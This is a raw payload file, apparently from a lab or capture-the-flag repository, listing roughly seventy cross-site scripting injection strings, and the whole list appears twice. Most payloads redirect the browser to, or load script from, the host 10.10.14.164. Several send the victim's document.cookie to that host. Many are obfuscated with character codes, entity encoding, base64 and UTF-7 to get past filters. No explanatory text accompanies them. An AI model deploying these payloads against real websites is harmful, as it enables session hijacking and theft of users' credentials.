w0r7h/xss_snake.txt

## xss_snake.txt
<script>document.location="http://10.10.14.164/xss-76.js?c="+document.cookie;</script>
<img src=x onerror=document.location="http://10.10.14.164/xss-75.js?c="+document.cookie>
<SCRIPT>window.location.replace('http://10.10.14.164/XSS-1');</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://10.10.14.164/xss-2.js></SCRIPT>
<IMG SRC="javascript:window.location.replace('http://10.10.14.164/XSS-3');">
<IMG SRC=javascript:window.location.replace('http://10.10.14.164/XSS-4')>
<IMG SRC=JaVaScRiPt:window.location.replace('http://10.10.14.164/XSS-5')>
<IMG SRC=javascript:window.location.replace(&quot;http://10.10.14.164/XSS-6&quot;)>
<IMG SRC=`javascript:window.location.replace('http://10.10.14.164/XSS-7')`>
<IMG SRC=javascript:eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,114,101,112,108,97,99,101,40,39,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,53,54,46,49,48,54,47,88,83,83,45,57,39,41));)>
SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav	ascript:window.location.replace('http://10.10.14.164/XSS-13');">
<IMG SRC="jav&#x09;ascript:window.location.replace('http://10.10.14.164/XSS-14');">
<IMG SRC="jav&#x0A;ascript:window.location.replace('http://10.10.14.164/XSS-15');">
<IMG SRC="jav&#x0D;ascript:window.location.replace('http://10.10.14.164/XSS-16');">
<IMG SRC=" &#14;  javascript:window.location.replace('http://10.10.14.164/XSS-17');">
<SCRIPT/XSS SRC="http://10.10.14.164/xss-18.js"></SCRIPT>
<SCRIPT SRC=http://10.10.14.164/xss-19.js?<B>
<IMG SRC="javascript:window.location.replace('http://10.10.14.164/XSS-20')"
<SCRIPT>a=/XSS/
\";window.location.replace('http://10.10.14.164/XSS-22');//
<INPUT TYPE="IMAGE" SRC="javascript:window.location.replace('http://10.10.14.164/XSS-23');">
<BODY BACKGROUND="javascript:window.location.replace('http://10.10.14.164/XSS-24')">
<BODY ONLOAD=window.location.replace('http://10.10.14.164/XSS-25')>
<IMG DYNSRC="javascript:window.location.replace('http://10.10.14.164/XSS-26')">
<IMG LOWSRC="javascript:window.location.replace('http://10.10.14.164/XSS-27')">
<BGSOUND SRC="javascript:window.location.replace('http://10.10.14.164/XSS-28');">
<BR SIZE="&{window.location.replace('http://10.10.14.164/XSS-29')}">
<LAYER SRC="http://10.10.14.164/scriptlet-30.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:window.location.replace('http://10.10.14.164/XSS-31');">
<LINK REL="stylesheet" HREF="http://10.10.14.164/xss-32.css">
<STYLE>@import'http://10.10.14.164/xss-33.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://10.10.14.164/xss-34.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://10.10.14.164/xssmoz-35.xml#xss")}</STYLE>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:window.location.replace('http://10.10.14.164/XSS-38');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnaHR0cDovLzE5Mi4xNjguNTYuMTA2L1hTUy00MCcpOzwvc2NyaVB0Pg==">
<META HTTP-EQUIV="Link" Content="<javascript:window.location.replace('http://10.10.14.164/XSS-41')>; REL=stylesheet">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:window.location.replace('http://10.10.14.164/XSS-42');">
<IFRAME SRC="javascript:window.location.replace('http://10.10.14.164/XSS-43');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:window.location.replace('http://10.10.14.164/XSS-44');"></FRAMESET>
<TABLE BACKGROUND="javascript:window.location.replace('http://10.10.14.164/XSS-45')">
<DIV STYLE="background-image: url(javascript:window.location.replace('http://10.10.14.164/XSS-46'))">
<DIV STYLE="background-image: url(&#1;javascript:window.location.replace('http://10.10.14.164/XSS-47'))">
<DIV STYLE="width: expression(window.location.replace('http://10.10.14.164/XSS-48'));">
<STYLE>@im\port'\ja\vasc\ript:window.location.replace("http://10.10.14.164/XSS-49")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(window.location.replace('http://10.10.14.164/XSS-50'))">
<XSS STYLE="xss:expression(window.location.replace('http://10.10.14.164/XSS-51'))">
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE TYPE="text/javascript">window.location.replace('http://10.10.14.164/XSS-53');</STYLE>
<STYLE>.XSS{background-image:url(javascript:window.location.replace('http://10.10.14.164/XSS-54'));}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url(javascript:window.location.replace('http://10.10.14.164/XSS-55'))}</STYLE>
<BASE HREF="javascript:window.location.replace('http://10.10.14.164/XSS-56');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://10.10.14.164/scriptlet-57.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:window.location.replace('http://10.10.14.164/XSS-58')></OBJECT>
getURL("javascript:window.location.replace('http://10.10.14.164/XSS-59')")
a="get";
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:window.location.replace('http://10.10.14.164/XSS-61');">
<XML SRC="http://10.10.14.164/xsstest-62.xml" ID=I></XML>
<HTML><BODY>
<SCRIPT SRC="http://10.10.14.164/xss-64.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://10.10.14.164/xss-65.js></SCRIPT>'"-->
<? echo('<SCR)';
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;window.location.replace('http://10.10.14.164/XSS-67')&lt;/SCRIPT&gt;">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-window.location.replace('http://10.10.14.164/XSS-68');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://10.10.14.164/xss-69.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://10.10.14.164/xss-70.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://10.10.14.164/xss-71.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://10.10.14.164/xss-72.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://10.10.14.164/xss-73.js"></SCRIPT>
<img src=x onerror=this.src="http://10.10.14.164/xss-74.js?c="+document.cookie>
	<script>document.location="http://10.10.14.164/xss-76.js?c="+document.cookie;</script>
	<img src=x onerror=document.location="http://10.10.14.164/xss-75.js?c="+document.cookie>
	<SCRIPT>window.location.replace('http://10.10.14.164/XSS-1');</SCRIPT>
	'';!--"<XSS>=&{()}
	<SCRIPT SRC=http://10.10.14.164/xss-2.js></SCRIPT>
	<IMG SRC="javascript:window.location.replace('http://10.10.14.164/XSS-3');">
	<IMG SRC=javascript:window.location.replace('http://10.10.14.164/XSS-4')>
	<IMG SRC=JaVaScRiPt:window.location.replace('http://10.10.14.164/XSS-5')>
	<IMG SRC=javascript:window.location.replace("http://10.10.14.164/XSS-6")>
	<IMG SRC=`javascript:window.location.replace('http://10.10.14.164/XSS-7')`>
	<IMG SRC=javascript:eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,114,101,112,108,97,99,101,40,39,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,53,54,46,49,48,54,47,88,83,83,45,57,39,41));)>
	SRC=&#10<IMG 6;avascript:alert('XSS')>
	<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
	<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
	<IMG SRC="jav ascript:window.location.replace('http://10.10.14.164/XSS-13');">
	<IMG SRC="jav ascript:window.location.replace('http://10.10.14.164/XSS-14');">
	<IMG SRC="jav ascript:window.location.replace('http://10.10.14.164/XSS-15');">
	<IMG SRC="jav ascript:window.location.replace('http://10.10.14.164/XSS-16');">
	<IMG SRC=" javascript:window.location.replace('http://10.10.14.164/XSS-17');">
	<SCRIPT/XSS SRC="http://10.10.14.164/xss-18.js"></SCRIPT>
	<SCRIPT SRC=http://10.10.14.164/xss-19.js?<B>
	<IMG SRC="javascript:window.location.replace('http://10.10.14.164/XSS-20')"
	<SCRIPT>a=/XSS/
	\";window.location.replace('http://10.10.14.164/XSS-22');//
	<INPUT TYPE="IMAGE" SRC="javascript:window.location.replace('http://10.10.14.164/XSS-23');">
	<BODY BACKGROUND="javascript:window.location.replace('http://10.10.14.164/XSS-24')">
	<BODY ONLOAD=window.location.replace('http://10.10.14.164/XSS-25')>
	<IMG DYNSRC="javascript:window.location.replace('http://10.10.14.164/XSS-26')">
	<IMG LOWSRC="javascript:window.location.replace('http://10.10.14.164/XSS-27')">
	<BGSOUND SRC="javascript:window.location.replace('http://10.10.14.164/XSS-28');">
	<BR SIZE="&{window.location.replace('http://10.10.14.164/XSS-29')}">
	<LAYER SRC="http://10.10.14.164/scriptlet-30.html"></LAYER>
	<LINK REL="stylesheet" HREF="javascript:window.location.replace('http://10.10.14.164/XSS-31');">
	<LINK REL="stylesheet" HREF="http://10.10.14.164/xss-32.css">
	<STYLE>@import'http://10.10.14.164/xss-33.css';</STYLE>
	<META HTTP-EQUIV="Link" Content="<http://10.10.14.164/xss-34.css>; REL=stylesheet">
	<STYLE>BODY{-moz-binding:url("http://10.10.14.164/xssmoz-35.xml#xss")}</STYLE>
	<IMG SRC='vbscript:msgbox("XSS")'>
	<IMG SRC="mocha:[code]">
	<IMG SRC="livescript:[code]">
	<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:window.location.replace('http://10.10.14.164/XSS-38');">
	<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnaHR0cDovLzE5Mi4xNjguNTYuMTA2L1hTUy00MCcpOzwvc2NyaVB0Pg==">
	<META HTTP-EQUIV="Link" Content="<javascript:window.location.replace('http://10.10.14.164/XSS-41')>; REL=stylesheet">
	<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:window.location.replace('http://10.10.14.164/XSS-42');">
	<IFRAME SRC="javascript:window.location.replace('http://10.10.14.164/XSS-43');"></IFRAME>
	<FRAMESET><FRAME SRC="javascript:window.location.replace('http://10.10.14.164/XSS-44');"></FRAMESET>
	<TABLE BACKGROUND="javascript:window.location.replace('http://10.10.14.164/XSS-45')">
	<DIV STYLE="background-image: url(javascript:window.location.replace('http://10.10.14.164/XSS-46'))">
	<DIV STYLE="background-image: url(javascript:window.location.replace('http://10.10.14.164/XSS-47'))">
	<DIV STYLE="width: expression(window.location.replace('http://10.10.14.164/XSS-48'));">
	<STYLE>@im\port'\ja\vasc\ript:window.location.replace("http://10.10.14.164/XSS-49")';</STYLE>
	<IMG STYLE="xss:expr/XSS/ession(window.location.replace('http://10.10.14.164/XSS-50'))">
	<XSS STYLE="xss:expression(window.location.replace('http://10.10.14.164/XSS-51'))">
	exp/<XSS STYLE='no\xss:noxss("//*");
	<STYLE TYPE="text/javascript">window.location.replace('http://10.10.14.164/XSS-53');</STYLE>
	<STYLE>.XSS{background-image:url(javascript:window.location.replace('http://10.10.14.164/XSS-54'));}</STYLE><A CLASS=XSS></A>
	<STYLE type="text/css">BODY{background:url(javascript:window.location.replace('http://10.10.14.164/XSS-55'))}</STYLE>
	<BASE HREF="javascript:window.location.replace('http://10.10.14.164/XSS-56');//">
	<OBJECT TYPE="text/x-scriptlet" DATA="http://10.10.14.164/scriptlet-57.html"></OBJECT>
	<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:window.location.replace('http://10.10.14.164/XSS-58')></OBJECT>
	getURL("javascript:window.location.replace('http://10.10.14.164/XSS-59')")
	a="get";
	<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:window.location.replace('http://10.10.14.164/XSS-61');">
	<XML SRC="http://10.10.14.164/xsstest-62.xml" ID=I></XML>
	<HTML><BODY>
	<SCRIPT SRC="http://10.10.14.164/xss-64.jpg"></SCRIPT>
	<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://10.10.14.164/xss-65.js></SCRIPT>'"-->
	<? echo('<SCR)';
	<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>window.location.replace('http://10.10.14.164/XSS-67')</SCRIPT>">
	<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-window.location.replace('http://10.10.14.164/XSS-68');+ADw-/SCRIPT+AD4-
	<SCRIPT a=">" SRC="http://10.10.14.164/xss-69.js"></SCRIPT>
	<SCRIPT a=">" '' SRC="http://10.10.14.164/xss-70.js"></SCRIPT>
	<SCRIPT "a='>'" SRC="http://10.10.14.164/xss-71.js"></SCRIPT>
	<SCRIPT a=`>` SRC="http://10.10.14.164/xss-72.js"></SCRIPT>
	<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://10.10.14.164/xss-73.js"></SCRIPT>
	<img src=x onerror=this.src="http://10.10.14.164/xss-74.js?c="+document.cookie>